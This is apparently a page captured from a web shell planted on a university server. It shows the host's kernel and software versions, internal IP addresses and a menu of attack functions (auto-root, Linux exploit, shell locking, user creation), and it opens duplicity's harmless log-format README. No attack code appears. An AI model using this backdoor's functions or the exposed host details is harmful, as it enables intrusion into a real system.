Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
duplicity /
[ HOME SHELL ]
Name
Size
Permission
Action
examples
[ DIR ]
drwxr-xr-x
changelog.Debian.gz
589
B
-rw-r--r--
copyright
3.1
KB
-rw-r--r--
NEWS.Debian.gz
2.55
KB
-rw-r--r--
NEWS.gz
2.55
KB
-rw-r--r--
README-LOG.md
1.25
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README-LOG.md
# duplicity's Log Output Duplicity's log output is meant as a means of reporting status and information back to the caller. This makes the life of a frontend writer much easier. The format consists of a stream of stanzas, each starting with a keyword and some arguments, an optional suggested user text (each line of which starts with ". ") and ending with an endline. Like so: >>> KEYWORD 3\n . Hello! All work and now play make Jack a...\n . dull boy.\n \n >>> You can get this output by specifying either *--log-fd* or *--log-file*. Currently, duplicity writes out status messages like WARNING or ERROR followed by a message number. Each message number uniquely identifies a particular warning or error so the frontend can take special action. For example, an ERROR of 2 is a command line syntax error. Each message type has its own namespace (i.e. a WARNING of 2 means something different than an ERROR of 2). A number of 1 is a generic, non-unique number for messages without their own code. For a list of current numbers, see log.py ## HINTS FOR CONSUMERS 1. Ignore any extra arguments on the keyword line. 2. Ignore any stanzas that have a keyword you don't recognize. 3. Ignore any lines in a stanza that start with a character you don't know.
Close